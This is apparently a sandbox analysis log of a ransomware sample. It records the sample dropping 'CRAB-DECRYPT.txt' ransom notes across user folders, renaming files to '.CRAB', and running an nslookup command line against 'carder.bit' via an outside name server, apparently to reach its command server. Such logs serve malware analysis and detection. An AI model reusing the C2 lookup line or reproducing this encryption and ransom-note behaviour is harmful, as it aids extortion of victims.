File Create filename = C:\Users\CIiHmnxMn6Ps\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\EEftF0yDYhdXB\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\K7ajnAqG4ABJKo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\K7ajnAqG4ABJKo\4Ol1NVxgeUs79kc\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZTzo C\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZTzo C\w4RvRjq1j87g\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\4F2otGvhrNXrv2J-y\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\4F2otGvhrNXrv2J-y\9vJRDM9WfVZaWqe-9Ats\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\hnnU39XhtzJjP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\hnnU39XhtzJjP\9yvqqzj0HmY1fXei6JPM\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\aTgk\hz2xeRBmW4nHOhdIomn\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\_private\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Favorites\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\J9V0B7uNl5yLpDod\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\J9V0B7uNl5yLpDod\aP8e0edr\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\J9V0B7uNl5yLpDod\dorC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\J9V0B7uNl5yLpDod\Vn8dzJxa3\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\zhuQB6w6CWfcI3\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\LweyS\A7WpA\J-YwcEJqn_mfqyVgy4\zhuQB6w6CWfcI3\rmnortzNuDYt0D Hpk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Music\OSTZ2CcMt18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG2, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG2.CRAB False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, destination_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.CRAB False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini.CRAB False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\OneDrive\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\b8-Mos8\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\b8-Mos8\opc2YyT8fbsCGp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\b8-Mos8\Za X3aTKSwL\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\Camera Roll\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Pictures\Saved Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Searches\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Videos\GK-87nNA_aQP40sS\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\AccountPictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Libraries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Process #19: nslookup.exe
8 18
»
Information Value
ID #19
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:04:25, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:00:11
OS Process Information
»
Information Value
PID 0x9e0
Parent PID 0x8e8 (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9E4
0x A34
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
nslookup.exe 0x00ad0000 0x00ae6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000fe0000 0x00fe0000 0x04fdffff Pagefile Backed Memory - True False False -
private_0x0000000004fe0000 0x04fe0000 0x04ffffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004fe0000 0x04fe0000 0x04feffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004ff0000 0x04ff0000 0x04ff3fff Private Memory Readable, Writable True False False -
private_0x0000000005000000 0x05000000 0x05001fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x05000000 0x05004fff Memory Mapped File Readable False False False -
pagefile_0x0000000005010000 0x05010000 0x05023fff Pagefile Backed Memory Readable True False False -
private_0x0000000005030000 0x05030000 0x0506ffff Private Memory Readable, Writable True False False -
private_0x0000000005070000 0x05070000 0x050affff Private Memory Readable, Writable True False False -
pagefile_0x00000000050b0000 0x050b0000 0x050b3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000050c0000 0x050c0000 0x050c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000050d0000 0x050d0000 0x050d1fff Private Memory Readable, Writable True False False -
private_0x00000000050e0000 0x050e0000 0x0511ffff Private Memory Readable, Writable True False False -
private_0x0000000005120000 0x05120000 0x0515ffff Private Memory Readable, Writable True False False -
private_0x0000000005160000 0x05160000 0x0516ffff Private Memory Readable, Writable True False False -
locale.nls 0x05170000 0x0522dfff Memory Mapped File Readable False False False -
imm32.dll 0x05230000 0x05259fff Memory Mapped File Readable False False False -
private_0x0000000005230000 0x05230000 0x05230fff Private Memory Readable, Writable True False False -
private_0x0000000005240000 0x05240000 0x05240fff Private Memory Readable, Writable True False False -
private_0x0000000005250000 0x05250000 0x05253fff Private Memory Readable, Writable True False False -
private_0x00000000052a0000 0x052a0000 0x0539ffff Private Memory Readable, Writable True False False -
private_0x0000000005470000 0x05470000 0x0547ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000005480000 0x05480000 0x05607fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005610000 0x05610000 0x05790fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000057a0000 0x057a0000 0x06b9ffff Pagefile Backed Memory Readable True False False -
wow64cpu.dll 0x54680000 0x54687fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54690000 0x546defff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x546e0000 0x54752fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x733c0000 0x733cafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x733d0000 0x733e2fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x733f0000 0x73405fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73410000 0x73421fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73430000 0x73475fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73480000 0x73487fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73490000 0x73513fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73520000 0x7356dfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73620000 0x73627fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73630000 0x7365ffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73e90000 0x73eaafff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x742b0000 0x74308fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74310000 0x74319fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74320000 0x7433dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74340000 0x743fdfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x74f00000 0x74f5bfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74f80000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74fb0000 0x7509ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x750a0000 0x75215fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75220000 0x75262fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75320000 0x7543ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x754d0000 0x7560ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75610000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75620000 0x7576cfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75970000 0x75a1bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77210000 0x77388fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007ee80000 0x7ee80000 0x7ef7ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ef80000 0x7ef80000 0x7efa2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa7fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efadfff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9eec1ffff Private Memory Readable True False False -
pagefile_0x00007df9eec20000 0x7df9eec20000 0x7ff9eec1ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9eec20000 0x7ff9eede1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9eede2000 0x7ff9eede2000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0x9e4
8 18
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xad0000 True 1
Fn
